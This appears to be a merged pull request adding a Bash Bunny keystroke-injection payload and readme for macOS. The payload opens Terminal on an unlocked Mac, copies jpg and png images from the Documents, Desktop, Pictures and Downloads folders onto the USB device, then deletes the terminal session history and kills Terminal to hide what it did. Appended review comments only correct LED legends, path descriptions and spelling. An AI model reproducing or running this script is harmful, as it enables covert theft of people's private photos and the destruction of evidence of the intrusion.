Exfilter all the images from the principal folders on unlocked MacOS … #586

Merged
merged 1 commit into from
Jun 6, 2023
69 changes: 69 additions & 0 deletions payloads/library/exfiltration/MacPhotoExfill/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
#!/bin/bash
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacPhotoExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000

lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED ATTACK

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
# Cleanup and delete proofs
LED M SLOW
QUACK ENTER
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync

LED FINISH
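Review bot: the LED legend in the header comment (`# Purple Setup`, `# Amber..............Attack Mode ON`, `# Green..............Finished`) does not match the LED commands the payload actually issues, which are `LED SETUP`, `LED ATTACK`, `LED M SLOW` and `LED FINISH`, and the `LED M SLOW` cleanup phase is missing from the legend entirely; document the four states as the payload defines them. The header should also state the working-directory assumption behind the `cp Documents/*.{jpg,jpeg,png} ...` and `cp Desktop/*.{png,jpg,jpeg} ...` lines, which use paths relative to wherever Terminal opens, so a reader knows the payload expects the shell to start in the target user's home directory. Style point: `# Ensure sincronization` should read `synchronization`.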
50 changes: 50 additions & 0 deletions payloads/library/exfiltration/MacPhotoExfill/readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
# Mac Photo Exfilter for the BashBunny


* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/


* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration

# DESCRIPTION

Exfilter all the images from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:

| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the images in /root/Documents folder |
| Desktop | All the images in /root/Desktop folder |
| Pictures | All the images in /root/Pictures folder |
| Downloads | All the images in /root/Downloads folder |

# IMAGE FORMATS

| Format |
| ------------------ |
| .jpg |
| .jpeg |
| .png |

# LED STATUS

| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
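Review bot: the DESCRIPTION table names the source folders as `/root/Documents`, `/root/Desktop`, `/root/Pictures` and `/root/Downloads`, but payload.txt copies from paths relative to the target user's shell (`Documents/`, `Desktop/`, `Pictures/`, `Downloads/`), and `/root` in this payload refers to the Bash Bunny's own filesystem (`/root/udisk/$lootdir`), not the target; the table should name the target user's home subfolders. The LED STATUS table (Green setup, Yellow blink, Purple slow, Green fixed) also disagrees with the legend in payload.txt (Purple setup, Amber attack, Green finished); pick one mapping and use it in both files. Finally, the stash path given as `/loot/MacPhotoExfill/$hostname` should match the payload's `loot/MacPhotoExfill/$TARGET_HOSTNAME` on the Bunny's udisk.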